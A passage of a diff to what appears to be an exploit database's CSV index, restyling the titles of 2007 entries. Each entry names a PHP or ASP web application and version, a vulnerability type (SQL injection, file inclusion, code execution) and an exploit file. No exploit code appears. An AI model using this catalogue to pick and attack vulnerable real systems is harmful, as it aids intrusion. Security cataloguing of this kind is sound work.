+3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - 'usergroups.php' SQL Injection",2007-03-15,x666,php,webapps,0 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 @@ -17415,37 +17418,37 @@ id,file,description,date,author,platform,type,port 3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",php,webapps,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 -3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryId) SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 +3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - 'gallery.asp categoryId' SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b - 'download.php' Arbitrary File Download",2007-03-15,Piker,php,webapps,0 3496,platforms/php/webapps/3496.php,"PHP-Stats 0.1.9.1b - (PC-REMOTE-ADDR) SQL Injection",2007-03-16,rgod,php,webapps,0 3497,platforms/php/webapps/3497.php,"PHP-Stats 0.1.9.1b - (ip) SQL Injection",2007-03-16,rgod,php,webapps,0 -3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 -3500,platforms/php/webapps/3500.htm,"Particle Blogger 1.2.0 - (post.php postid) SQL Injection",2007-03-16,WiLdBoY,php,webapps,0 +3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - 'kommentare.php' SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 +3500,platforms/php/webapps/3500.htm,"Particle Blogger 1.2.0 - 'post.php postid' SQL Injection",2007-03-16,WiLdBoY,php,webapps,0 3501,platforms/php/webapps/3501.txt,"PHP DB Designer 1.02 - Remote File Inclusion",2007-03-16,GoLd_M,php,webapps,0 -3502,platforms/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - (PHP-stats-options.php) Admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 -3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - (view.php logi) Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 +3502,platforms/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 +3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - 'view.php logi' Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3505,platforms/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)",2007-03-18,DarkFig,php,webapps,0 3506,platforms/php/webapps/3506.htm,"Guestbara 1.2 - Change Admin Login and Password Exploit",2007-03-18,Kacper,php,webapps,0 3507,platforms/php/webapps/3507.pl,"ScriptMagix FAQ Builder 2.0 - 'index.php' SQL Injection",2007-03-18,ajann,php,webapps,0 3508,platforms/php/webapps/3508.txt,"Moodle 1.5.2 - (moodledata) Remote Session Disclosure",2007-03-18,xSh,php,webapps,0 -3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - (index.php catid) SQL Injection",2007-03-18,ajann,php,webapps,0 -3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - (index.php catid) SQL Injection",2007-03-18,ajann,php,webapps,0 +3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - 'index.php catid' SQL Injection",2007-03-18,ajann,php,webapps,0 +3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - 'index.php catid' SQL Injection",2007-03-18,ajann,php,webapps,0 3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating 2.0 - SQL Injection",2007-03-18,ajann,php,webapps,0 3512,platforms/php/webapps/3512.txt,"PHP-Nuke - iFrame (iframe.php) Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0 3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) 1.0 - SQL Injection",2007-03-18,Kacper,php,webapps,0 -3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - (index.php recid) SQL Injection",2007-03-19,ajann,php,webapps,0 +3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - 'index.php recid' SQL Injection",2007-03-19,ajann,php,webapps,0 3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Arbitrary File Upload",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion",2007-03-19,GoLd_M,php,webapps,0 3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 3520,platforms/asp/webapps/3520.txt,"NetVIOS Portal - 'page.asp' SQL Injection",2007-03-19,parad0x,asp,webapps,0 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 (Windows) - Local File Inclusion",2007-03-19,bd0rk,php,webapps,0 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,php,webapps,0 -3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 -3528,platforms/php/webapps/3528.pl,"PHPRaid < 3.0.7 - (rss.php PHPraid_dir) Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 -3530,platforms/php/webapps/3530.pl,"Monster Top List 1.4.2 - (functions.php root_path) Remote File Inclusion",2007-03-20,fluffy_bunny,php,webapps,0 +3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - 'htmltonuke.php' Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 +3528,platforms/php/webapps/3528.pl,"PHPRaid < 3.0.7 - 'rss.php PHPraid_dir' Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 +3530,platforms/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,php,webapps,0 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) 0.15 - Remote File Inclusion",2007-03-21,K-159,php,webapps,0 -3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - (module.php) Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 +3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - 'module.php' Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3534,platforms/asp/webapps/3534.txt,"Active Link Engine - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'catid' Parameter SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0 @@ -17456,14 +17459,14 @@ id,file,description,date,author,platform,type,port 3546,platforms/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' Parameter SQL Injection",2007-03-22,parad0x,asp,webapps,0 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion",2007-03-23,GoLd_M,php,webapps,0 3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'catid' Parameter SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 -3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 -3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 +3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 +3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - 'default.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0 3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 -3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 +3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - 'index.php cms' Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 3563,platforms/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php lib_path' Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla! Component Car Manager 1.1 - SQL Injection",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla! Component RWCards 2.4.3 - SQL Injection",2007-03-24,ajann,php,webapps,0 @@ -17475,37 +17478,37 @@ id,file,description,date,author,platform,type,port 3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution",2007-03-26,Hessam-x,php,webapps,0 3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module AddressBook 1.2 - Local File Inclusion",2007-03-26,bd0rk,php,webapps,0 3583,platforms/php/webapps/3583.txt,"C-Arbre 0.6PR7 - 'ROOT_PATH' Remote File Inclusion",2007-03-26,K-159,php,webapps,0 -3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - (print.php id) SQL Injection",2007-03-27,WiLdBoY,php,webapps,0 +3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - 'print.php id' SQL Injection",2007-03-27,WiLdBoY,php,webapps,0 3590,platforms/php/webapps/3590.htm,"Joomla! Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,php,webapps,0 3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion",2007-03-27,kezzap66345,php,webapps,0 -3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - (index.php cat_id) SQL Injection",2007-03-28,ajann,php,webapps,0 +3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - 'index.php cat_id' SQL Injection",2007-03-28,ajann,php,webapps,0 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0 -3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - (view.php id) SQL Injection",2007-03-28,ajann,php,webapps,0 -3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - (quotes.php) Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 +3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - 'view.php id' SQL Injection",2007-03-28,ajann,php,webapps,0 +3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - 'quotes.php' Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 -3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - (inc/lang.php) Local File Inclusion",2007-03-29,GoLd_M,php,webapps,0 +3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - 'inc/lang.php' Local File Inclusion",2007-03-29,GoLd_M,php,webapps,0 3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection",2007-03-29,ajann,php,webapps,0 -3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - (wall.php cat) SQL Injection",2007-03-29,Kacper,php,webapps,0 +3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - 'wall.php cat' SQL Injection",2007-03-29,Kacper,php,webapps,0 3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Inclusion",2007-03-29,"ThE dE@Th",php,webapps,0 3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3611,platforms/php/webapps/3611.txt,"JC URLShrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository - 'viewcat.php' SQL Injection",2007-03-30,ajann,php,webapps,0 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0 -3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 +3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - 'login.php table' Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3620,platforms/php/webapps/3620.pl,"XOOPS Module Core - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3621,platforms/php/webapps/3621.pl,"XOOPS Module Tutoriais - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3622,platforms/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - (WebMail) Remote Add Super User Exploit",2007-04-01,rgod,php,webapps,0 -3623,platforms/php/webapps/3623.pl,"XOOPS Module eCal 2.24 - (display.php) SQL Injection",2007-04-01,ajann,php,webapps,0 -3624,platforms/php/webapps/3624.txt,"BT-sondage 1.12 - (gestion_sondage.php) Remote File Inclusion",2007-04-01,Crackers_Child,php,webapps,0 +3623,platforms/php/webapps/3623.pl,"XOOPS Module eCal 2.24 - 'display.php' SQL Injection",2007-04-01,ajann,php,webapps,0 +3624,platforms/php/webapps/3624.txt,"BT-sondage 1.12 - 'gestion_sondage.php' Remote File Inclusion",2007-04-01,Crackers_Child,php,webapps,0 3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0 3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop 1.17 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0 3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0 3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection",2007-04-01,ajann,php,webapps,0 -3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - (genre.php) Blind SQL Injection",2007-04-01,ajann,php,webapps,0 +3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection",2007-04-01,ajann,php,webapps,0 3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps,0 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection",2007-04-01,ajann,php,webapps,0 @@ -17515,7 +17518,7 @@ id,file,description,date,author,platform,type,port 3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",php,webapps,0 3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection",2007-04-02,ajann,php,webapps,0 3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection",2007-04-02,ajann,php,webapps,0 -3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - (print.php) SQL Injection",2007-04-02,ajann,php,webapps,0 +3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - 'print.php' SQL Injection",2007-04-02,ajann,php,webapps,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution",2007-04-03,DarkFig,php,webapps,0 3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - (postid) Blind SQL Injection",2007-04-03,ajann,php,webapps,0 3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - 'xmlrpc' SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0 @@ -17525,29 +17528,29 @@ id,file,description,date,author,platform,type,port 3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0 3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 -3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection",2007-04-04,ajann,php,webapps,0 +3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection",2007-04-04,ajann,php,webapps,0 3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusion",2007-04-05,bd0rk,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs 2.4 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 -3673,platforms/php/webapps/3673.txt,"WebSPELL 4.01.02 - (picture.php) File Disclosure",2007-04-05,Trex,php,webapps,0 -3676,platforms/php/webapps/3676.txt,"Beryo 2.0 - (downloadpic.php chemin) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 -3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - (download2.php fn1) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 +3673,platforms/php/webapps/3673.txt,"WebSPELL 4.01.02 - 'picture.php' File Disclosure",2007-04-05,Trex,php,webapps,0 +3676,platforms/php/webapps/3676.txt,"Beryo 2.0 - 'downloadpic.php chemin' Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 +3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - 'download2.php fn1' Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 3678,platforms/php/webapps/3678.php,"SmodBIP 1.06 - (aktualnosci zoom) SQL Injection",2007-04-06,Kacper,php,webapps,0 3679,platforms/php/webapps/3679.php,"SmodCMS 2.10 - (Slownik ssid) SQL Injection",2007-04-06,Kacper,php,webapps,0 -3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - (smilies.php config) Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 +3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - 'smilies.php config' Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] Local File Inclusion",2007-04-08,bd0rk,php,webapps,0 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - Remote File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 -3686,platforms/php/webapps/3686.txt,"WitShare 0.9 - (index.php menu) Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 +3686,platforms/php/webapps/3686.txt,"WitShare 0.9 - 'index.php menu' Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 - (sn_admin_dir) Local File Inclusion",2007-04-08,BeyazKurt,php,webapps,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - 'lang' Local File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps,0 -3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - (warn.php) Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 +3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - 'warn.php' Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 3697,platforms/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution",2007-04-10,Dj7xpl,php,webapps,0 -3699,platforms/php/webapps/3699.txt,"PHPGalleryScript 1.0 - (init.gallery.php include_class) Remote File Inclusion",2007-04-10,anonymous,php,webapps,0 +3699,platforms/php/webapps/3699.txt,"PHPGalleryScript 1.0 - 'init.gallery.php include_class' Remote File Inclusion",2007-04-10,anonymous,php,webapps,0 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0 @@ -17566,86 +17569,86 @@ id,file,description,date,author,platform,type,port 3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Parameter Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,php,webapps,0 3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0 -3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0 -3723,platforms/php/webapps/3723.txt,"Request It 1.0b - (index.php id) Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 -3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - (options.php/save.php) Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 +3722,platforms/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php cfg_file' Remote File Inclusion",2007-04-12,mdx,php,webapps,0 +3723,platforms/php/webapps/3723.txt,"Request It 1.0b - 'index.php id' Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 +3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - 'options.php/save.php' Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 3729,platforms/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion",2007-04-13,Omni,php,webapps,0 3731,platforms/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 -3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 +3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - 'class.Smarty.php' Remote File Inclusion",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0 -3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 -3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0 +3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - 'who_r.php bj' Remote File Inclusion",2007-04-15,irvian,php,webapps,0 +3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - 'footer.php template' Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - (GALLERY_BASEDIR) Multiple Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Parameter Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 -3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - (scr/soustab.php) Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 +3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - 'scr/soustab.php' Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0 3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps,0 -3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - (index.php ads_file) Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 +3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - 'index.php ads_file' Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 3752,platforms/php/webapps/3752.txt,"AjPortal2Php - (PagePrefix) Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",php,webapps,0 -3753,platforms/php/webapps/3753.txt,"Joomla! Component JoomlaPack 1.0.4a2 RE - (CAltInstaller.php) Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 +3753,platforms/php/webapps/3753.txt,"Joomla! Component JoomlaPack 1.0.4a2 RE - 'CAltInstaller.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 3754,platforms/php/webapps/3754.pl,"MiniGal b13 - Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 -3758,platforms/php/webapps/3758.php,"ShoutPro 1.5.2 - (shout.php) Remote Code Injection",2007-04-17,Gammarays,php,webapps,0 +3758,platforms/php/webapps/3758.php,"ShoutPro 1.5.2 - 'shout.php' Remote Code Injection",2007-04-17,Gammarays,php,webapps,0 3759,platforms/php/webapps/3759.pl,"Joomla! Component Template Be2004-2 - 'index.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 3760,platforms/php/webapps/3760.txt,"jGallery 1.3 - 